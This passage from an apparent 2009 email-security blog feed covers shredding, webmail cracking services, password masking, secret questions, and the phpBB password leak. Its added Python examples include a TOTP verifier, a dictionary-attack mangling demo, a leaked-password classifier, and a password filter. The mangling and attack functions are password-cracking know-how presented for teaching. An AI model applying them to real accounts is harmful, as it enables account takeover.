<p>A <a target="_blank" href="http://blog.stop-idfraud.co.uk/2009/10/it-could-be-you.php" onclick="pageTracker._trackPageview('/outgoing/blog.stop-idfraud.co.uk/2009/10/it-could-be-you.php?referer=');">recent survey</a> showed that a surprising 79 percent of all businesses do not destroy sensitive information on paper that is being discarded or recycled. The UK-based survey showed that 64 percent of businesses have a clear policy on handling written documents with sensitive information, yet 32 percent of employees admitted to discarding sensitive documents directly into the trash.</p>
<p>The survey, which was conducted as part of National Identity Fraud Prevention Week, says that identity fraud costs over £1.2 billion every year. Forty percent of the companies surveyed said they throw away information on customers, including home addresses, phone numbers, and even photocopies of passports, all of which can be used to perpetrate identity theft. Individuals are as vulnerable as businesses, and the report says that 44 percent of Britons still do not shred documents with sensitive information. And here&#8217;s a shocking statistic: the survey showed that half of all households threw away everything a criminal would need to perpetrate identity theft, and that 79 percent of all household waste had at least one item that could help a criminal.</p>
<p>The answer, of course, is simple, non-technical and inexpensive. First, put a policy in place that says all documents with any personal information must be destroyed; and second, install paper shredders in convenient locations throughout the office (cross-cut rather than strip-cut, since strip-cut output can be pieced back together).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/11/physical-protection-of-passwords-and-sensitive-information/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Password theft is big business</title>
		<link>http://www.theemailadmin.com/2009/09/password-theft-is-big-business/</link>
		<comments>http://www.theemailadmin.com/2009/09/password-theft-is-big-business/#comments</comments>
		<pubDate>Wed, 16 Sep 2009 12:20:47 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[password security]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=1520</guid>
		<description><![CDATA[If you still think your web-based email account is safe enough to use for business (or anything else for that matter), take a look at an article in last week’s Washington Post. The story details an account of the “other woman” who engaged the services of a cracker web site called YourHackerz.com to break into [...]
]]></description>
			<content:encoded><![CDATA[
<p>If you still think your web-based email account is safe enough to use for business (or anything else for that matter), take a look at an article in last week’s <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2009/09/06/AR2009090602238.html" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.washingtonpost.com/wp-dyn/content/article/2009/09/06/AR2009090602238.html?referer=');">Washington Post</a>. The story details an account of the “other woman” who engaged the services of a cracker web site called YourHackerz.com to break into her boyfriend’s email and her boyfriend’s wife’s email.</p>
<p>The service is able to quickly deliver a password to a customer, for a surprisingly small fee. And YourHackerz.com isn’t the only one of its kind; there are dozens of similar services on the Internet that advertise their dark services freely. For a hundred bucks, they promise to “crack all major web based emails”, including Yahoo!, Hotmail, AOL and Gmail. The service even provides proof of the break-in before payment. How’s that for good marketing?</p>
<p>Although the cracker service bureau doesn’t specify its techniques, the Washington Post article speculates that it uses a Trojan horse: the victim receives an email with a link to a greeting card or some other innocuous-looking item which, when downloaded, installs a keystroke logger that captures passwords and sends them back to the attacker. It’s quite likely that these types of services use a combination of techniques.</p>
<p>The first thing to do to protect yourself is to realize that yes, there are people who want to read your email. Probably more than you think. And it’s very easy for those people to get access, for a small fee, from one of these cracker services within just two or three days. We all tend to think we’re immune. We think nobody can break in, and what’s worse, we think nobody wants to. Unfortunately, it happens all the time, and when we least expect it. Spying, espionage, and just plain snooping happens every day, both in business and in social life. It may be to steal our bank accounts, or it may just be to gather corporate secrets or personal information. If you think your spouse is cheating on you, how far would you go to confirm it?</p>
<p>Regardless of what motivations people may have to crack your email password, there are things that you can do to protect yourself. First and foremost, don’t use free webmail accounts for anything sensitive; they are the easiest to break into by far (as Sarah Palin found out when her Yahoo! account was taken over through its password-reset questions). Next, use complex passwords. This can only go so far as a means of protection though: if the cracker has a keystroke logger on your machine, no matter how complex your password is, it can be stolen, which is one reason a second authentication factor matters. Use encrypted email for sensitive messages, and make sure the login page and the session after it are served over HTTPS rather than plain HTTP.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/09/password-theft-is-big-business/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Should password masking stand?</title>
		<link>http://www.theemailadmin.com/2009/07/should-password-masking-stand/</link>
		<comments>http://www.theemailadmin.com/2009/07/should-password-masking-stand/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 13:02:14 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[email management]]></category>
		<category><![CDATA[password protection]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=1206</guid>
		<description><![CDATA[There&#8217;s been some debate in the blogosphere this past week about password masking, ever since blogger and web usability guru Jakob Nielsen suggested that passwords be shown in clear text as opposed to just a series of bullets as they are typed in by the user. Nielsen, the leading expert in web site usability, claims that password [...]
]]></description>
			<content:encoded><![CDATA[
<p>There&#8217;s been some debate in the blogosphere this past week about password masking, ever since blogger and web usability guru <a target="_blank" href="http://www.useit.com/alertbox/passwords.html" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.useit.com/alertbox/passwords.html?referer=');">Jakob Nielsen</a> suggested that passwords be shown in clear text as opposed to just a series of bullets as they are typed in by the user. Nielsen, the leading expert in web site usability, claims that password masking violates the basic principle of usability.</p>
<p>And Dr. Nielsen has a point. It&#8217;s often happened to me&#8211;I&#8217;m typing in a password. I get interrupted for a moment, and wonder whether I typed in the right character. I look at the screen, but since there is nothing there but a row of bullets, I can&#8217;t tell. Typing in passwords into smartphones and other mobile devices is especially vexing, since most people&#8217;s fingers just aren&#8217;t meant for typing on tiny keyboards, and typos are common. And if your admin has done his/her job right, if you make three typos in a row, you&#8217;ll get locked out. Having clear-text feedback in the password box would eliminate a lot of these problems and make for easier login.</p>
<p>A <a target="_blank" href="https://blogs.sans.org/appsecstreetfighter/2009/06/28/response-to-nielsens-stop-password-masking/" onclick="pageTracker._trackPageview('/outgoing/blogs.sans.org/appsecstreetfighter/2009/06/28/response-to-nielsens-stop-password-masking/?referer=');">SANS response</a> to Dr. Nielsen acknowledges the usability issue but raises a few concerns: shoulder-surfing or even accidental observation of an unmasked password, and the risk of browser autocomplete prefilling passwords along with other form data, where a clear-text field would expose the stored value to anyone at the keyboard. There may also be some compliance issues.</p>
<p>From a security perspective, eliminating password masking should be approached with caution, but the real security comes from stronger passwords and from encryption of the session, not from the masking itself. SANS recommends going further and implementing two-factor authentication, which both increases security and improves usability. A one-time-code token reduces what the user has to get right from memory, which overcomes a lot of objections, and it takes the sting out of shoulder-surfing: even if someone looks over your shoulder and reads the code in clear text, it is useless to them, since the token generates a new code for every use and the server refuses a code it has already accepted.</p>
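<p>The claim that a shoulder-surfed one-time code is useless rests on two things: the code changes every use, and the server refuses a code it has already accepted. The following is an added example, not code from the original post or the SANS article, implementing the RFC 4226 HOTP and RFC 6238 TOTP algorithms with the RFC test secret and a small verifier that enforces single use; the one-step drift window is an assumption for illustration.</p>

```python
"""One-time codes: why a shoulder-surfed second factor is worthless.

Added example, not code from the original post or the SANS article.  Code
generation follows RFC 4226 (HOTP) and RFC 6238 (TOTP); the verifier that
refuses replays is the part a shoulder-surfer runs into.
"""
import hashlib
import hmac
import struct
import time

# RFC 4226 Appendix D test secret, reused by RFC 6238 for its SHA-1 vectors.
RFC4226_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: dynamic truncation of HMAC-SHA1 over the 8-byte big-endian counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, unix_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter taken from the current 30-second time step."""
    return hotp(secret, int(unix_time // step), digits)


class OtpVerifier:
    """Server-side check that makes an observed code single-use.

    Accepts the current step and (assumption, for clock drift) one step either
    side, but never a step at or below the last one that was accepted.  A code
    read off a screen in clear text is therefore burnt the moment its owner
    logs in with it.
    """

    def __init__(self, secret: bytes, step: int = 30, drift_steps: int = 1):
        self.secret = secret
        self.step = step
        self.drift_steps = drift_steps
        self.last_used_step = -1

    def verify(self, code: str, unix_time: float) -> bool:
        now_step = int(unix_time // self.step)
        for step in range(now_step - self.drift_steps, now_step + self.drift_steps + 1):
            if step <= self.last_used_step:
                continue  # replay of an accepted code, or older than one already used
            if hmac.compare_digest(hotp(self.secret, step), code):
                self.last_used_step = step
                return True
        return False


if __name__ == "__main__":
    now = time.time()
    verifier = OtpVerifier(RFC4226_SECRET)
    shown = totp(RFC4226_SECRET, now)
    print("legitimate login:", verifier.verify(shown, now))
    print("shoulder-surfer replays it:", verifier.verify(shown, now + 5))
```

<p>The replay check is the important line: without <code>last_used_step</code> an observed code stays valid for the rest of its 30-second step plus the drift window, which is plenty of time for someone who just watched it being typed.</p>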
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/07/should-password-masking-stand/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft study shows &#8216;secret question&#8217; password recovery is weak</title>
		<link>http://www.theemailadmin.com/2009/07/microsoft-study-shows-secret-question-password-recovery-is-weak/</link>
		<comments>http://www.theemailadmin.com/2009/07/microsoft-study-shows-secret-question-password-recovery-is-weak/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 12:48:31 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=1190</guid>
		<description><![CDATA[During the US Presidential election, when Sarah Palin&#8217;s Yahoo! email account got hacked, two things became apparent: First, don&#8217;t use free public email accounts for business, and second, be careful of the &#8220;secret question&#8221; password recovery tool. The latter allowed the hacker to gain access to Gov. Palin&#8217;s account. Microsoft released a report this week [...]
]]></description>
			<content:encoded><![CDATA[
<p>During the US Presidential election, when Sarah Palin&#8217;s Yahoo! email account got hacked, two things became apparent: First, don&#8217;t use free public email accounts for business, and second, be careful of the &#8220;secret question&#8221; password recovery tool. The latter allowed the hacker to gain access to Gov. Palin&#8217;s account.</p>
<p>Microsoft released a report this week highlighting just how vulnerable the secret question gambit really is. Sure, password resets take up help-desk time, but letting end users reset them on their own this way is just a bad idea. Microsoft&#8217;s study, which was reported on in the <a target="_blank" href="http://www.newscientist.com/article/dn17347-secret-questions-leave-accounts-vulnerable.html" onclick="pageTracker._trackPageview('/outgoing/www.newscientist.com/article/dn17347-secret-questions-leave-accounts-vulnerable.html?referer=');">New Scientist</a>, showed that the answer to the secret question is often easily guessed. The study recruited webmail users&#8217; acquaintances and asked them to guess the answers to those users&#8217; secret questions; the acquaintances guessed right about 20 percent of the time.</p>
<p>But you don&#8217;t have to know the person to make a good guess. Social networking sites are typically full of personal tidbits of information. What&#8217;s your dog&#8217;s name? Chances are, if you&#8217;re a dog lover, you&#8217;ve posted a few pictures of your pooch here and there, and have mentioned the lovable mutt&#8217;s name a couple times on your blog, Twitter, or social networking page. It&#8217;s easy to find. What was the name of your high school? That&#8217;s an easy one to discover. Ever hear of Classmates.com?</p>
<p>The Microsoft study recommends an alternative to the secret question, which involves a user selecting multiple individuals to act as trustees; if the user gets locked out, they ask the trustees to download a recovery code. The user collects the recovery codes, and then can gain access to the account. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/07/microsoft-study-shows-secret-question-password-recovery-is-weak/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Raising the Security Wall Higher</title>
		<link>http://www.theemailadmin.com/2009/03/raising-the-security-wall-higher/</link>
		<comments>http://www.theemailadmin.com/2009/03/raising-the-security-wall-higher/#comments</comments>
		<pubDate>Thu, 05 Mar 2009 15:30:06 +0000</pubDate>
		<dc:creator>Carl E. Reid</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[password protection]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=466</guid>
		<description><![CDATA[No matter how email users may complain, friendly reminders regarding email security protecting company information assets are part of the ongoing education process.  Email users quickly forget that the company owns the information within each email account. The email system is owned by the company, not the email user. This also implies that it&#8217;s up [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="alignright size-full wp-image-468" title="password-lockout &amp; password security" src="http://www.theemailadmin.com/wp-content/uploads/2009/03/password-lockout11.gif" alt="password-lockout11" width="180" height="194" />No matter how email users may complain, friendly reminders about email security and the protection of company information assets are part of the ongoing education process. Email users quickly forget that the company owns the information within each email account. The email system is owned by the company, not the email user. This also implies that it&#8217;s up to each person to ensure that their email account is always secure. People lazily create passwords that are familiar and easy to guess.</p>
<p>Email administrators are the gate keepers who ensure email accounts are kept secure. Sometimes this requires setting up secure procedures which appear to be an inconvenience to the end user community. Forcing 8 character passwords instead of 6 character passwords can make all the difference: every extra character multiplies the number of possible passwords by the size of the character set, so two extra characters from a 62-character alphabet make an exhaustive search nearly 4,000 times longer. The inconvenience is minimal compared to thwarting password <strong><a target="_blank" href="http://en.wikipedia.org/wiki/Dictionary_attack" onclick="pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Dictionary_attack?referer=');">dictionary attacks</a></strong> or <strong><a target="_blank" href="http://en.wikipedia.org/wiki/Brute_force_attack" onclick="pageTracker._trackPageview('/outgoing/en.wikipedia.org/wiki/Brute_force_attack?referer=');">brute force attacks</a></strong>.</p>
<p>Raising the security wall also calls for insisting people use pass phrases, rather than passwords.  Choosing a simple password typically makes a dictionary attack easier for the account hacker.  People take the path of least resistance by selecting names of pets, kids, spouses, birthdays, house address or basically something that ends up being an extremely poor password choice.</p>
<p><span id="more-466"></span>Dictionary attacks are getting more successful because attackers use large dictionaries and combine them with foreign-language dictionaries. Adding technical dictionaries increases the chance of hitting the correct password. Another reason dictionary attacks succeed is mangling rules that generate variations of each dictionary word: for example, an attacker will try each word spelled forward and backward, capitalized, with digits appended, or with letters swapped for look-alike digits.</p>
<p><em><strong>Considerations to Minimize Brute Force Attacks</strong></em></p>
<ul>
<li>Require a minimum password length of 8 to 10 characters, and more for a passphrase</li>
<li>Allow, and encourage, characters other than letters and digits, such as *, # or $</li>
<li>Lock the account after 5 failed login attempts, but make the lockout temporary (or throttle attempts) so that an attacker cannot lock legitimate users out of their own accounts at will</li>
</ul>
<p><strong>A brute force attack will always succeed, eventually</strong>. The deciding factor is how long it takes: with a sufficiently long passphrase drawn from a large character set, exhausting the combinations can take years, long past the point where the attack is worth running.</p>
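<p>An added example, not code from the original post, showing why the three recommendations above narrow but do not close the dictionary attack described earlier: it applies common mangling rules (reversal, capitalisation, leetspeak, appended digits and symbols) to a constructed four-word list, keeps only the variants that satisfy an "8 characters plus a symbol" policy, and shows that a policy-compliant password such as P@$$w0rd! still falls within a couple of hundred guesses. The wordlist, the rule set and the policy parameters are assumptions chosen for illustration.</p>

```python
"""Why '8 characters plus a symbol' narrows but does not stop a dictionary attack.

Added example, not code from the original post.  The wordlist, the rule set
and the policy parameters are assumptions chosen for illustration; real
cracking wordlists run to millions of entries and far richer rule sets.
"""
import string

# Constructed stand-in for a real wordlist.
WORDLIST = ["password", "fluffy", "dictionary", "summer"]

# The leetspeak substitutions the attacker is assumed to try.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def mangle(word: str):
    """Yield the variants a cracker's rule set produces from one base word:
    as-is, capitalised, upper-cased, reversed, each also in leetspeak, then
    with common suffixes and prefixes bolted on."""
    plain = [word, word.capitalize(), word.upper(), word[::-1]]
    bases = set(plain) | {b.translate(LEET) for b in plain}
    for base in sorted(bases):
        yield base
        for suffix in ("1", "123", "!", "2009", "#1"):
            yield base + suffix
        for prefix in ("1", "!"):
            yield prefix + base


def meets_policy(candidate: str, min_length: int = 8, require_symbol: bool = True) -> bool:
    """The policy the post recommends: a minimum length and a non-alphanumeric character."""
    if len(candidate) < min_length:
        return False
    if require_symbol and not any(c in string.punctuation for c in candidate):
        return False
    return True


def policy_compliant_guesses(wordlist, **policy):
    """Mangled candidates that pass the policy: the slice of the attack the policy does not stop."""
    return sorted({c for w in wordlist for c in mangle(w) if meets_policy(c, **policy)})


def rule_based_attack(target: str, wordlist, **policy):
    """Return the guess number at which target falls, or None.  Only policy-compliant
    candidates are tried, since the attacker knows the policy too."""
    for n, candidate in enumerate(policy_compliant_guesses(wordlist, **policy), start=1):
        if candidate == target:
            return n
    return None


def keyspace_fraction(wordlist, length: int = 8, alphabet: int = 94, **policy) -> float:
    """Fraction of the nominal 94^8 keyspace that the compliant mangled list occupies:
    the policy makes the space look huge, the attacker searches a sliver of it."""
    return len(policy_compliant_guesses(wordlist, **policy)) / alphabet ** length


if __name__ == "__main__":
    guesses = policy_compliant_guesses(WORDLIST)
    print(len(guesses), "policy-compliant candidates from", len(WORDLIST), "words; first few:", guesses[:5])
    print("P@$$w0rd! (8+ chars, symbols, digits) falls at guess", rule_based_attack("P@$$w0rd!", WORDLIST))
    print("Fluffy123 passes the length rule but not the symbol rule:", meets_policy("Fluffy123"))
    print("fraction of the nominal keyspace searched: %.1e" % keyspace_fraction(WORDLIST))
```

<p>The point of <code>keyspace_fraction</code> is the gap between the two numbers the post talks about: the brute-force keyspace that "could require years" and the few hundred rule-generated candidates that the attacker actually tries first. Length and symbol rules raise the first number; only a passphrase that is not a mangled dictionary word escapes the second.</p>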
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/03/raising-the-security-wall-higher/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacked web site shows password vulnerability</title>
		<link>http://www.theemailadmin.com/2009/02/hacked-web-site-shows-password-vulnerability/</link>
		<comments>http://www.theemailadmin.com/2009/02/hacked-web-site-shows-password-vulnerability/#comments</comments>
		<pubDate>Mon, 16 Feb 2009 22:27:26 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[password protection]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=379</guid>
		<description><![CDATA[An unrepentant, arrogant loser with too much time on his hands hacked into the Phpbb.com web site, published thousands of user passwords, and then took the time to boast about it online. The script kiddie justifies his actions by noting that he did not alter any files on the server, and that he did what [...]
]]></description>
			<content:encoded><![CDATA[
<p>An unrepentant, arrogant loser with too much time on his hands hacked into the phpBB.com web site, published thousands of user passwords, and then took the time to <a href="http://hackedphpbb.blogspot.com/">boast about it online</a>. The script kiddie justifies his actions by noting that he did not alter any files on the server, and that he did what he did out of boredom. His excuses are lame, but we won&#8217;t dwell on that. What&#8217;s newsworthy is that the passwords he stole and subsequently published were so simple. Loser that he may be, we still owe him a debt of gratitude for showing us this. Yes, it seems there are still people out there who use &#8220;123456&#8221; as a password.</p>
<p>After the attack, security expert Robert Graham, writing on <a href="http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html">Dark Reading</a>, took the time to go through the published list and analyze it for patterns, and he came up with what he calls &#8220;interesting&#8221; results. &#8220;Startling&#8221; might be a more appropriate adjective.</p>
<p>First of all, the site allowed very simple passwords, not even requiring a mix of numbers and letters. According to Graham&#8217;s analysis, 65 percent of the passwords matched a standard dictionary file, and 94 percent matched hacker dictionaries (the word lists used by password-cracking tools). Put another way: an attacker with a dictionary file and a way to try guesses at the login prompt unhindered would get into roughly two of every three of these accounts. His breakdown of the list:</p>
<ul>
<li>16 percent matched a person&#8217;s first name</li>
<li>14 percent were keyboard patterns</li>
<li>4 percent were variations of the word &#8220;password&#8221;</li>
<li>5 percent were pop-culture references</li>
<li>4 percent referenced nearby things</li>
<li>3 percent were emo words</li>
<li>3 percent were &#8220;don&#8217;t care&#8221; words</li>
<li>1.3 percent were passwords seen on television or in the movies</li>
<li>1 percent were sports related</li>
</ul>
<p>The most popular password was &#8220;123456&#8221;, chosen by 3.03 percent of users; 2.13 percent chose the word &#8220;password&#8221; itself.</p>
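<p>To make that kind of tally concrete, here is an added example (not code from the original post, and not Graham&#8217;s own tooling): a small Python script that sorts a password dump into buckets of the same sort (variations of &#8220;password&#8221;, keyboard patterns, first names, dictionary words) and reports the percentages, the most common entries, and the difference between a plain dictionary match and what a cracking word list with mangling rules would also catch. The word lists and the sample dump are constructed and deliberately tiny, so the numbers it prints are illustrative only; point it at a real dictionary, a real names list and the leaked file to reproduce the exercise.</p>

```python
"""Sort a leaked password list into the buckets a post-breach analysis uses.

Added example, not code from the original post or from the Dark Reading
analysis it cites. The wordlists and the sample dump are constructed and
deliberately tiny; a real run loads a full dictionary, a first-names list
and the actual leaked file.
"""
from collections import Counter

# Constructed stand-ins for a "standard dictionary" and a names list.
DICTIONARY = {"password", "dragon", "monkey", "letmein", "shadow", "master",
              "sunshine", "football", "hello", "secret", "freedom", "love"}
FIRST_NAMES = {"michael", "jennifer", "daniel", "ashley", "robert", "david"}
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
TRAILING = "0123456789!"  # junk users bolt on to satisfy a length rule


def is_keyboard_pattern(pw: str, min_len: int = 4) -> bool:
    """A run along one keyboard row in either direction ('123456', 'qwerty',
    'asdfgh'), or one key held down ('111111')."""
    p = pw.lower()
    if len(p) < min_len:
        return False
    if len(set(p)) == 1:
        return True
    return any(p in row or p in row[::-1] for row in KEYBOARD_ROWS)


def is_password_variant(pw: str) -> bool:
    """'password', 'Password1', 'P@ssw0rd', 'passw0rd!' and the like."""
    p = pw.lower().rstrip(TRAILING)
    p = p.replace("@", "a").replace("0", "o").replace("$", "s")
    return p == "password"


def classify(pw: str) -> str:
    """Primary bucket for one password; first matching rule wins."""
    p = pw.lower()
    if is_password_variant(pw):
        return "password-variant"
    if is_keyboard_pattern(pw):
        return "keyboard-pattern"
    if p in FIRST_NAMES:
        return "first-name"
    if p.rstrip(TRAILING) in DICTIONARY:
        return "dictionary"
    return "other"


def analyze(passwords):
    """Return (bucket percentages, most common passwords, plain-dictionary
    hit rate, cracking-wordlist hit rate).

    The plain rate counts only exact lower-case matches against the word and
    name lists, which is what a 'standard dictionary file' pass finds. The
    cracking rate counts everything that landed in some bucket, i.e. what a
    hacker dictionary with mangling rules would also catch."""
    total = len(passwords)
    buckets = Counter(classify(p) for p in passwords)
    pct = {k: round(100.0 * v / total, 2) for k, v in buckets.items()}
    top = Counter(passwords).most_common(3)
    plain = sum(p.lower() in DICTIONARY | FIRST_NAMES for p in passwords)
    cracked = total - buckets["other"]
    return pct, top, round(100.0 * plain / total, 2), round(100.0 * cracked / total, 2)


# Constructed sample dump (not the phpBB.com data).
SAMPLE_DUMP = ["123456", "123456", "password", "qwerty", "Michael", "dragon",
               "P@ssw0rd", "letmein", "Jennifer", "111111", "monkey1",
               "xK9#vQ2p", "asdfgh", "football", "Password1", "shadow",
               "7Hq!mZ3r", "david", "zxcvbn", "secret"]

if __name__ == "__main__":
    pct, top, plain, cracked = analyze(SAMPLE_DUMP)
    for bucket, share in sorted(pct.items(), key=lambda kv: -kv[1]):
        print(f"{bucket:17s} {share:5.2f}%")
    print("most common:", top)
    print(f"plain dictionary: {plain}%  cracking wordlist: {cracked}%")
```

<p>The gap between the two hit rates is the point of the exercise: a password that survives a plain dictionary check because someone appended a digit or swapped an &#8220;o&#8221; for a zero falls to the first mangling rule a cracking tool applies, so a policy that only forbids exact dictionary words buys very little.</p>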
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/02/hacked-web-site-shows-password-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Are you giving away your password?</title>
		<link>http://www.theemailadmin.com/2009/02/are-you-giving-away-your-password/</link>
		<comments>http://www.theemailadmin.com/2009/02/are-you-giving-away-your-password/#comments</comments>
		<pubDate>Mon, 02 Feb 2009 13:28:38 +0000</pubDate>
		<dc:creator>Dan Blacharski</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[password protection]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=300</guid>
		<description><![CDATA[We still wonder how people managed to hack into our email accounts&#8211;but a recent survey gives us the answer. Is your email password &#8220;Spot&#8221;? How about &#8220;Rover&#8221;? Oh, you&#8217;re a cat lover? Okay, then I guess &#8220;Fluffy.&#8221; According to a survey on the people search website www.yasni.co.uk, 83 percent of British users responding to the [...]
]]></description>
			<content:encoded><![CDATA[
<p>We still wonder how people managed to hack into our email accounts, but a recent survey gives us the answer. Is your email password &#8220;Spot&#8221;? How about &#8220;Rover&#8221;? Oh, you&#8217;re a cat lover? Okay, then I guess &#8220;Fluffy.&#8221;</p>
<p>According to a survey on the people search website <a href="http://www.yasni.co.uk">www.yasni.co.uk</a>, 83 percent of British users responding to the survey use their dog&#8217;s name, their own date of birth or their maiden name as a password on private email accounts or, even worse, to log onto online banking.</p>
<p>What&#8217;s even more surprising is that only 37 percent said they were aware that disclosing this type of information online could be dangerous. Just browse through Facebook or MySpace and see how many phone numbers you find. Way too many. Some people even go so far as to post their street addresses. Social networking pages are a treasure trove of personal information, much of which can be used to guess passwords; the same facts also answer the &#8220;secret questions&#8221; many sites use to reset a forgotten password. And so we add another rule to the password Bible: <em>Never use as a password anything that can be found on your MySpace page</em>. Sixty percent never considered the dangers of putting this information online, so it&#8217;s time to send out the memo and let everybody in the company know.</p>
<p>Although social networking sites typically let people switch a profile to a &#8220;private&#8221; setting, &#8220;public&#8221; is the default, and many users won&#8217;t bother changing it, or don&#8217;t realize that they can. The danger is clear: profiles left public can be mined for the pet names, birthdays and family names that feed a password-guessing attack. A memo alone will not enforce the rule; a password filter that rejects anything built from the user&#8217;s own name, email address or birthday, with the usual capitalisation and number-suffix tricks undone, catches the worst of it at the moment the password is set.</p>
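<p>As an added example, not code from the original post or from any directory product, here is a Python check of that kind: given the profile facts an attacker could read off a public page (names, pet, email address, date of birth), it derives the strings they would try first and refuses a candidate password that contains any of them after undoing capitalisation, trailing digits and punctuation, common leet spellings, and the separators inside a date. The profile fields, the substitution table, the date formats and the sample profile are all assumptions chosen to show the check; adapt the field list to what your directory actually holds.</p>

```python
"""Reject passwords built from facts that sit on a public profile.

Added example, not code from the original post or from any product. The
profile fields, the leet table, the date formats and the sample values are
assumptions chosen to show the check; adapt the field list to what your
directory actually holds.
"""
import re
from datetime import date
from typing import Optional

# Common substitutions users think disguise a word ('F1uffy', 'Sp0t').
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "l", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})
TRAILING = "0123456789!@#$%^&*.-_"
# Ways a date of birth turns up inside a password (assumed set).
DATE_FORMATS = ("%Y", "%m%d", "%d%m", "%m%d%Y", "%d%m%Y", "%Y%m%d",
                "%d%m%y", "%m%d%y")
NAME_FIELDS = ("first_name", "last_name", "maiden_name", "pet", "partner", "town")


def profile_tokens(profile: dict) -> set:
    """Strings an attacker would try first, derived from the profile.

    Tokens shorter than three characters are dropped: they would match
    almost anything and make the check useless."""
    tokens = set()
    for field in NAME_FIELDS:
        value = profile.get(field)
        if value:
            tokens.add(value.lower())
    email = profile.get("email")
    if email:
        tokens.add(email.split("@")[0].lower())  # the local part
    dob = profile.get("dob")
    if isinstance(dob, date):
        tokens.update(dob.strftime(fmt) for fmt in DATE_FORMATS)
    return {t for t in tokens if len(t) >= 3}


def password_uses_profile(pw: str, profile: dict) -> Optional[str]:
    """Return the profile token the password is built from, or None if clean.

    Several normalised views of the password are searched so that
    capitalisation, trailing digits or punctuation, leet spelling and
    separators inside a date do not hide the match. Longest token first,
    so 'sarahwhitfield' reports 'whitfield' rather than 'sarah'."""
    low = pw.lower()
    stripped = low.rstrip(TRAILING)
    views = {low, stripped, stripped.translate(LEET), low.translate(LEET),
             re.sub(r"[^a-z0-9]", "", low)}
    for token in sorted(profile_tokens(profile), key=len, reverse=True):
        if any(token in view for view in views):
            return token
    return None


# Constructed sample profile: the kind of data a public page gives away.
SAMPLE_PROFILE = {"first_name": "Sarah", "maiden_name": "Whitfield",
                  "pet": "Fluffy", "email": "sarah.w@example.com",
                  "dob": date(1985, 3, 12)}

if __name__ == "__main__":
    for candidate in ("Fluffy2009!", "F1uffy!", "12-03-1985", "Sarah1985",
                      "sarah.w", "Tr0ub4dor&3"):
        hit = password_uses_profile(candidate, SAMPLE_PROFILE)
        print(f"{candidate:14s} -> {'REJECT (' + hit + ')' if hit else 'ok'}")
```

<p>Run it at password-change time with the user&#8217;s own directory record as the profile. The check is deliberately generous about what counts as a match, because the attacker is: &#8220;Fluffy2009!&#8221; and &#8220;F1uffy!&#8221; are both the dog&#8217;s name to anyone running a word list with a handful of mangling rules.</p>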
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2009/02/are-you-giving-away-your-password/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

